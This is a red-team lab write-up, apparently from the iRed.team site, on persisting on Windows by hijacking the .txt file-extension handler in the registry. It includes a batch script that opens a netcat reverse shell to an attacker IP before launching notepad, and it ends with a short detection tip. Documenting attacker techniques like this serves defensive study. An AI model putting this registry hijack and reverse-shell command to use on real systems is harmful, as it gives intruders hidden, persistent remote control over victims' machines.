Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this iRed.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
T1053: Schtask
T1035: Service Execution
T1015: Sticky Keys
T1136: Create Account
T1013: AddMonitor()
T1128: NetSh Helper DLL
T1084: Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
T1180: Screensaver Hijack
T1138: Application Shimming
T1197: BITS Jobs
T1122: COM Hijacking
T1198: SIP & Trust Provider Hijacking
T1209: Hijacking Time Providers
T1130: Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Windows Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Hijacking Default File Extension

When a .txt file is double clicked, it's opened with a notepad.exe. Windows knows that it needs to use notepad.exe for opening txt files, because the .txt extension (among many others) are mapped to applictions that can open those files in Windows registry located at Computer\HKEY_CLASSES_ROOT.

It's possible to hijack a file extension and make it execute a malicious application before the actual file is opened.

In this quick lab, I'm going to hijack the .txt extension - the victim user will still be able to open the original .txt file, but it will additionally fire a reverse shell back to the attacking system.

Execution

The .txt extension handler is defined in the below registry key:

Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command

Below shows that the command responsible for opening .txt files is notepad.exe %1, where %1 is the argument for notepad.exe, which specifies a file name the notepad should open:

Say, a target user has the file test.exe on his desktop with the below file contents:

Let's now create a malicious file that we want to be executed when the user attempts to open the benign file test.txt. For this lab, the malicious file is going to be a simple Windows batch file located in c:\tools\shell.cmd:

c:\tools\shell.cmd
start C:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe
start notepad.exe %1

Once executed, c:\tools\hell.cmd will launch a simple netcat reverse shell to the attacking system and also a notepad with the test.txt file as an argument.

We are now ready to hijack the .txt file extension by modifying the value data of Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command to c:\tools\shell.cmd %1 as shown below:

Demo

Opening the test.txt file by double clikcing it opens the file itself, but a reverse shell is thrown to the attacking system as well:

Detection

Defenders may want to monitor registry for file extension command changes, especially if the data field contains binaries located in unusual places.

References

Previous
Windows Logon Helper
Next
Persisting in svchost.exe with a Service DLL
Last updated 12 months ago
Contents
Execution
Demo
Detection
References